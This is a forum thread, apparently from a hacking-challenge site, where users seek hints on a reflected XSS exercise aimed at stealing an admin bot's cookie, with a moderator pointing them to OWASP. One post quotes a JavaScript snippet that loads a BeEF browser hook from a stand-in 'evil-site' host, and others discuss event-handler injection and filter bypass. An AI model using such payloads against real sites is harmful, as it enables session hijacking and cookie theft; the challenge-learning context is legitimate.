0x0 Web - Client

vendredi 2 novembre 2018, 13:09  #1
XSS REFLECTED
Boris
  • 11 posts

hi. i am a bit stuck
so i have discovered place where i can use event handlers , i can get alert box, but only interaction events are working like onclick

but what would be the way to get the cookie ? a hint ?

tnx

samedi 3 novembre 2018, 13:03  #2
XSS REFLECTED
Th1b4ud
  • 264 posts

The bot has the same behavior as a human. Have you test all the event ? https://www.w3schools.com/tags/ref_eventattributes.asp :)

samedi 3 novembre 2018, 14:20  #3
XSS REFLECTED
Boris
  • 11 posts

even though i will find the event, and if we talk that bot is human alike, i cannot use script tag, and still need to send location to my server, how would i achieve that in the tag ?
do i have to use BEEF ?

samedi 3 novembre 2018, 14:56  #4
XSS REFLECTED
Th1b4ud
  • 264 posts

Xss is not only <script>alert(1)</script>. There is multiple way to exploit xss. And why do you want to use Beef ? Do you know what Beef is doing ? Are you really sure it could be usefull here ?

dimanche 4 novembre 2018, 12:32  #5
XSS REFLECTED
Boris
  • 11 posts

bcs the only place i have found its the tag space and several even handlers, so i cannot use SCRIPT word
and need to send location

have found this script over the net

var s = document.createElement(’script’) ; s.src=’http://evil-site/beef/hook/beefmagic.js.php’ ;document.getElementsByTagName(’head’)[0].appendChild(s) ;
Beef can hook a brower and extract a cookie, but that didnt work for me..

how can i send cookie in other way in the tag space ?

dimanche 4 novembre 2018, 13:14  #6
XSS REFLECTED
Th1b4ud
  • 264 posts

Stop copy/paste anything you found on internet. You must understand what you are doing ! There is several ressources on internet about XSS. Juste google it

dimanche 4 novembre 2018, 13:57  #7
XSS REFLECTED
Boris
  • 11 posts

i have read a lot...
but within the tag its different , if i were to have img tag so its easy , using src, but its different , or i miss something ? in what xss direction should i read ?

i can understad whats happens in scrpt above, its the creation of object with script allowed, bypassing xss filter on the server, and then loading beef js hook, that can give control over a browser

dimanche 4 novembre 2018, 14:26  #8
XSS REFLECTED
Th1b4ud
  • 264 posts

No I think you don’t read a lot. First link in google = owasp guide. Its the first thing you have to read. Why it’s not done ?
https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)

samedi 24 novembre 2018, 04:17  #9
XSS REFLECTED
ttuongann
  • 3 posts

Hi Th1b4ud , i detected " a tag xss " , and i try to "onmouseover" but bot dont’ request cookies ... anything hint for me

samedi 24 novembre 2018, 11:34  #10
XSS REFLECTED
Th1b4ud
  • 264 posts

I think you are on the good way. Always check your source code after submit your payload. You have to bypass some filters ;)

mardi 27 novembre 2018, 15:28  #11
XSS REFLECTED
ttuongann
  • 3 posts

thanks Th1 , i think i did anything i know , i used to expoloit on "error page" and success . Whene i reported admin , however bot don’t request :(

mercredi 5 décembre 2018, 17:06  #12
XSS REFLECTED
Boris
  • 11 posts

i have reflected xss for myself, but how to force an admin to it...?
i have found an html event, bypassed " filter
but there is one more filter if i want to use the xss for the admin....
i need a (hero) hint pls

tnx